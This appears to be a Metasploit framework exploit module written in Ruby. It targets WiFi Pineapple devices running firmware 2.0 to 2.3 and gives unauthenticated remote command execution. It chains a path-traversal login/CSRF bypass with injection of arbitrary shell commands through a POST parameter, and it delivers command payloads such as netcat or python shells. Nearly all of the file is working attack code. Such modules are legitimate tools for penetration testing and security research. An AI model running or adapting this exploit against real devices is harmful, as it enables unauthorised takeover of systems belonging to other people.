metasploit-framework/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb

108 lines
2.8 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
'Description' => %q{
This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
These devices may typically be identified by their SSID beacons of 'Pineapple5_....';
Provided as part of the TospoVirus workshop at DEFCON23.
},
'Author' => ['catatonicprime'],
'License' => MSF_LICENSE,
'References' => [ ],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic python netcat telnet'
}
},
'Targets' =>
[
[ 'WiFi Pineapple 2.0.0 - 2.3.0', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 1 2015'))
register_options(
[
OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),
Opt::RPORT(1471),
Opt::RHOST('172.16.42.1')
]
)
deregister_options(
'ContextInformationFile',
'DOMAIN',
'DigestAuthIIS',
'EnableContextEncoding',
'FingerprintCheck',
'HttpClientTimeout',
'NTLM::SendLM',
'NTLM::SendNTLM',
'NTLM::SendSPN',
'NTLM::UseLMKey',
'NTLM::UseNTLM2_session',
'NTLM::UseNTLMv2',
'SSL',
'SSLVersion',
'VERBOSE',
'WORKSPACE',
'WfsDelay',
'Proxies',
'VHOST'
)
end
def cmd_uri
normalize_uri('includes', 'css', 'styles.php', '../../..', target_uri.path)
end
def cmd_inject(cmd)
res = send_request_cgi(
'method' => 'POST',
'uri' => cmd_uri,
'vars_get' => {
'execute' => "" # Presence triggers command execution
},
'vars_post' => {
'commands' => cmd
})
res
end
def check
res = cmd_inject("echo")
if res && res.code == 200 && res.body =~ /Executing/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
print_status('Attempting to bypass login/csrf checks...')
unless check
fail_with(Failure::NoAccess, 'Failed to bypass login/csrf check...')
end
print_status('Executing payload...')
cmd_inject("#{payload.encoded}")
end
end